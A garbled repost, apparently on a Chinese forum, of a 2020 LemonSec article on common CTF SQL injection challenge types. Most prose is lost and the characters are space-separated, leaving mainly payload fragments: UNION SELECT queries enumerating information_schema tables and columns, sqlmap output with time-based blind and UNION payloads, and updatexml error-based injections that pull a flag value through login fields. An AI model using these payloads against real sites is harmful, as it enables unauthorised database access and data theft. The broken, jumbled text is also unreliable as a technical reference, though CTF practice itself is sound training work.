[21090] 2020-06-19_CTF中SQL注入常见题型整理

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2020-06-19_CTF中SQL注入常见题型整理 C T F S Q L L e m o n S e c   2 0 2 0 - 0 6 - 1 9  
4 .   i d = - 2 '   u n i o n   s e l e c t   1 , 2 , 3 , ( s e l e c t g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e t a b l e _ s c h e m a = d a t a b a s e ( ) ) # 5 . i d = - 2 '     u n i o n   s e l e c t 1 , 2 , 3 , ( s e l e c t   g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e t a b l e _ n a m e = ' f l 4 g ' ) #
S Q L m a p - - - P a r a m e t e r :   i d   ( P O S T )         T y p e :   A N D / O R   t i m e - b a s e d   b l i n d         T i t l e :   M y S Q L   > =   5 . 0 . 1 2   A N D t i m e - b a s e d   b l i n d         P a y l o a d :   i d = 1 '   A N D   S L E E P ( 5 ) A N D   ' S h h A ' = ' S h h A           T y p e :   U N I O N   q u e r y         T i t l e :   G e n e r i c   U N I O N   q u e r y ( N U L L )   -   4   c o l u m n s         P a y l o a d :   i d = - 2 2 9 2 '   U N I O N   A L L S E L E C T C O N C A T ( 0 x 7 1 6 b 7 1 6 b 7 1 , 0 x 4 5 7 8 4 b 6 e 4 e 7 8 4 4 6 d 7 3 7 0 5 3 4 7 6 e 4 c 4 8 7 5 7 0 4 c 6 a 5 8 4 1 4 e 4 4 4 1 7 1 6 7 6 2 6 4 6 7 4 f 6 3 4 d 4 3 6 c 5 0 6 f 5 5 4 d 6 3 6 b , 0 x 7 1 7 6 6 a 7 6 7 1 ) , N U L L , N U L L , N U L L - - E K P R - - -   3 .  

2
u n i o n



2 . = = u s e r n a m e = a d m i n '   o r   u p d a t e x m l / * & p a s s w o r d = * / ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e ) f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   ! ( t a b l e _ s c h e m a   < > d a t a b a s e ( ) ) ) , 0 x 7 e ) , 1 )   o r   ' 1 u s e r n a m e = a d m i n '   o r   u p d a t e x m l / * & p a s s w o r d = * / ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a R E G E X P   d a t a b a s e ( ) ) , 0 x 7 e ) , 1 )   o r ' 1 3 .   u s e r n a m e = a d m i n '   o r   u p d a t e x m l / * & p a s s w o r d = * / ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e R E G E X P   ' f f l l 4 4 j j '   ) , 0 x 7 e ) , 1 )   o r ' 1 4 u s e r n a m e = a d m i n '   o r   u p d a t e x m l / * & p a s s w o r d = * / ( 1 , c o n c a t ( 0 x 7 e , ( s e l e c t v a l u e   f r o m   f f l l 4 4 j j   ) , 0 x 7 e ) , 1 )   o r   ' 1 R E G E X P =
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则